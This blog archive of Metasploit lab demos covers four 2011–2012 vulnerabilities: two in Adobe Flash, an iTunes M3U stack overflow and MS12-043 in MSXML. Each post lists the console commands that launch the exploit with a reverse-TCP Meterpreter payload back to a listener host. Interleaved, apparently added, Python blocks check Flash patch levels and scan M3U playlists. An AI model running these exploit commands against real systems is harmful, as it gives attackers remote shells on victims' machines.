Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

CVE-2011-2110 / APSB11-18 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered being exploited in the wild
Public release of the vulnerability by the vendor on 2011-06-14
Details of the vulnerability provided on 2011-10-09
Metasploit PoC provided on 2012-06-19

PoC provided by :

mr_me
Unknown

Reference(s) :

CVE-2011-2110
OSVDB-73007
APSB11-18
BID-48268

Affected version(s) :

Adobe Flash Player 10.3.181.23 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 10.3.185.23 and earlier versions for Android

Tested on Windows XP Pro SP3 with :

Internet Explorer 8
Adobe Flash Player 10.3.181.23

Description :

This module exploits a vulnerability in Adobe Flash Player versions 10.3.181.23 and earlier. The issue is caused by a failure in the ActionScript 3 AVM2 verification logic, which results in unsafe JIT (Just-In-Time) code being executed. This is the same vulnerability that was used in attacks against Korean-based organizations. Specifically, when an array is indexed using an arbitrary value, memory can be referenced and later executed. Taking advantage of this issue does not rely on heap spraying, as the vulnerability can also be used for information leakage. Currently this exploit works for IE6, IE7, IE8, Firefox 10.2 and likely several other browsers under multiple Windows platforms. This exploit bypasses ASLR/DEP and is very reliable.

Commands :

use exploit/windows/browser/adobe_flashplayer_arrayindexing
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0779 / APSB12-09 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered being exploited in the wild
Public release of the vulnerability by the vendor on 2012-05-04
Details of the vulnerability provided on 2012-05-06
Metasploit PoC provided on 2012-06-22

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

CVE-2012-0779
OSVDB-81656
APSB12-09
BID-53395

Affected version(s) :

Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Macintosh and Linux operating systems
Adobe Flash Player 11.1.115.7 and earlier versions for Android 4.x, and Adobe Flash Player 11.1.111.8 and earlier versions for Android 3.x and 2.x

Tested on Windows XP Pro SP3 with :

Internet Explorer 6
Adobe Flash Player 11.2.202.228

Description :

This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt AMF0 “_error” response, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “World Uyghur Congress Invitation.doc” e-mail attack. According to the advisory, 10.3.183.19 and 11.x before 11.2.202.235 are affected.

Commands :

use exploit/windows/browser/adobe_flash_rtmp
set RTMPHOST 192.168.178.100
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid
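Both Flash demos above are decided purely by the installed build number, so the check a defender wants after either advisory is a correct version comparison against the "Affected version(s)" lines. The following is an added example written for this page, not code from the blog, from Metasploit or from Adobe: the thresholds are copied from the two Affected version(s) sections (APSB11-18 / CVE-2011-2110 and APSB12-09 / CVE-2012-0779), the platform labels and the host inventory are constructed for illustration, and the comparison pads short version strings with zeros so that "11.2" compares as "11.2.0.0".

```python
# Added example (not from the blog or Metasploit): patch-state check for the
# two Flash advisories on this page. Thresholds come from the page's
# "Affected version(s)" sections; platform labels and inventory are constructed.

from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int, int]

# Highest affected build per (advisory, platform). Any build <= this is exposed.
AFFECTED_MAX: Dict[str, Dict[str, Version]] = {
    "APSB11-18": {                      # CVE-2011-2110
        "windows": (10, 3, 181, 23),    # also Mac, Linux, Solaris per the advisory
        "android": (10, 3, 185, 23),
    },
    "APSB12-09": {                      # CVE-2012-0779
        "windows": (11, 2, 202, 233),   # also Mac, Linux per the advisory
        "android4": (11, 1, 115, 7),
        "android3": (11, 1, 111, 8),    # Android 3.x and 2.x
    },
}

def parse_version(text: str) -> Version:
    """Turn '11.2.202.228' into a 4-tuple of ints; missing trailing parts become 0."""
    parts = text.strip().split(".")
    if not parts or len(parts) > 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted Flash version: {text!r}")
    parts += ["0"] * (4 - len(parts))
    return tuple(int(p) for p in parts)  # type: ignore[return-value]

def is_affected(version: str, advisory: str, platform: str = "windows") -> bool:
    """True if the installed build is at or below the advisory's highest affected build."""
    return parse_version(version) <= AFFECTED_MAX[advisory][platform]

def exposed_advisories(version: str, platform: str = "windows") -> List[str]:
    """Advisories on this page for which the given build is still exposed."""
    installed = parse_version(version)
    return [adv for adv, plats in AFFECTED_MAX.items()
            if platform in plats and installed <= plats[platform]]

# Constructed inventory: host, platform label, installed Flash build.
SAMPLE_INVENTORY = """\
ws01,windows,10.3.181.23
ws02,windows,11.2.202.228
ws03,windows,11.2.202.235
tab01,android4,11.1.115.7
"""

def audit_inventory(csv_text: str) -> Dict[str, List[str]]:
    """Map each host to the advisories it is still exposed to (empty list = patched)."""
    report: Dict[str, List[str]] = {}
    for line in csv_text.splitlines():
        if not line.strip():
            continue
        host, platform, version = (f.strip() for f in line.split(","))
        report[host] = exposed_advisories(version, platform)
    return report

if __name__ == "__main__":
    for host, advs in audit_inventory(SAMPLE_INVENTORY).items():
        print(f"{host}: {'exposed to ' + ', '.join(advs) if advs else 'patched'}")
```

Note that the two builds the demos were tested against (10.3.181.23 and 11.2.202.228) both come out as exposed, and that an old 10.3 build is reported against both advisories, since the APSB12-09 range "11.2.202.233 and earlier" includes it.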

Apple iTunes 10 Extended M3U Stack Buffer Overflow Vulnerability Metasploit Demo

Timeline :

Vulnerability silently fixed in the product on 2012-06-11, without notice of the vulnerability
Vulnerability discovered by Rh0
Public release of the vulnerability on 2012-06-20
Metasploit PoC provided on 2012-06-20

PoC provided by :

Rh0
sinn3r

Reference(s) :

EDB-ID-19322
HT5318
OSVDB-83220
Rh0

Affected version(s) :

iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.69 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.70 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.71 on XP SP3
iTunes 10.4.0.80 to 10.6.1.7 with QuickTime 7.72 on XP SP3

Tested on Windows XP Pro SP3 with :

Apple iTunes 10.6.1.7
Apple QuickTime 7.72.80.56

Description :

This module exploits a stack buffer overflow in iTunes 10.4.0.80 to 10.6.1.7. When opening an extended .m3u file containing an “#EXTINF:” tag description, iTunes copies the content after “#EXTINF:” from a heap buffer to a stack buffer without appropriate checking, writing beyond the stack buffer’s boundary, which allows code execution under the context of the user. Please note that before using this exploit, you must have precise knowledge of the victim machine’s QuickTime version (if installed), and then select your target accordingly. In addition, even though this exploit can be used remotely, you should be aware of the victim’s browser behavior when opening an itms link. For example, IE/Firefox/Opera by default will ask the user for permission before launching the itms link in iTunes. Chrome will ask for permission, but also shows a warning. Safari would be an ideal target, because it will open the link without any user interaction.

Commands :

use exploit/windows/misc/itunes_extm3u_bof
set SRVHOST 192.168.178.100
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid
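The description above pins the iTunes bug to one field: whatever follows “#EXTINF:” is copied into a fixed-size stack buffer without a length check. A mail gateway or endpoint scanner can therefore triage playlists by looking at exactly that field. The following scanner is an added example for this page, not code from the blog, from Metasploit or from Apple: the 256-byte limit is an assumed triage threshold (the page does not state the size of the overflowed buffer), and the playlist it runs over is constructed, with one ordinary entry and one whose description is far longer than any real title.

```python
# Added example (not from the blog or Metasploit): flag extended M3U files
# whose "#EXTINF:" descriptions are oversized or contain non-printable bytes.
# MAX_EXTINF_LEN is an assumed triage threshold, not the real stack buffer size.

from dataclasses import dataclass
from typing import List, Optional

MAX_EXTINF_LEN = 256  # assumption: well above any legitimate "duration,title" line

@dataclass
class Finding:
    line_no: int   # 1-based line in the playlist
    reason: str
    length: int    # byte length of the text after "#EXTINF:"

def extinf_body(line: str) -> Optional[str]:
    """Return the text after '#EXTINF:' (the part iTunes copies), or None if not an EXTINF line."""
    prefix = "#EXTINF:"
    if line.startswith(prefix):
        return line[len(prefix):]
    return None

def scan_m3u(text: str, max_len: int = MAX_EXTINF_LEN) -> List[Finding]:
    """Scan an extended M3U playlist and report EXTINF lines worth blocking or inspecting."""
    findings: List[Finding] = []
    for no, line in enumerate(text.splitlines(), 1):
        body = extinf_body(line)
        if body is None:
            continue
        size = len(body.encode("utf-8"))
        if size > max_len:
            findings.append(Finding(no, "oversized EXTINF description", size))
        elif not body.isprintable():
            # Control or NUL bytes never belong in a "duration,title" field.
            findings.append(Finding(no, "non-printable bytes in EXTINF description", size))
    return findings

def is_suspicious(text: str) -> bool:
    """Convenience wrapper: True if the playlist produced any finding."""
    return bool(scan_m3u(text))

# Constructed sample: a normal entry followed by an entry with a 600-byte description.
SAMPLE_PLAYLIST = (
    "#EXTM3U\n"
    "#EXTINF:123,Sample Artist - Sample Title\n"
    "sample.mp3\n"
    "#EXTINF:" + "A" * 600 + "\n"
    "oversized.mp3\n"
)

if __name__ == "__main__":
    for f in scan_m3u(SAMPLE_PLAYLIST):
        print(f"line {f.line_no}: {f.reason} ({f.length} bytes)")
```

The threshold is deliberately generous so that long but legitimate titles pass; the point is that the copied field, not the whole file, is what needs bounding, and the same check is cheap enough to run on every playlist attachment before it reaches a host where iTunes is registered for the itms handler.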

MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo

Timeline :

Vulnerability found being exploited in the wild
Public release of the vulnerability on 2012-06-12
Metasploit PoC provided on 2012-06-15

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

MSA-2719615
MS12-043
MS KB 2719615
CVE-2012-1889
OSVDB-82873

Affected version(s) :

Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0.

Tested on Windows XP Pro SP3 with :

Internet Explorer 6 (6.0.2900.5512.xpsp_sp3_gdr.11025-1629)

Description :

This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution. At the moment, this module only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.

Commands :

use exploit/windows/browser/msxml_get_definition_code_exec
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid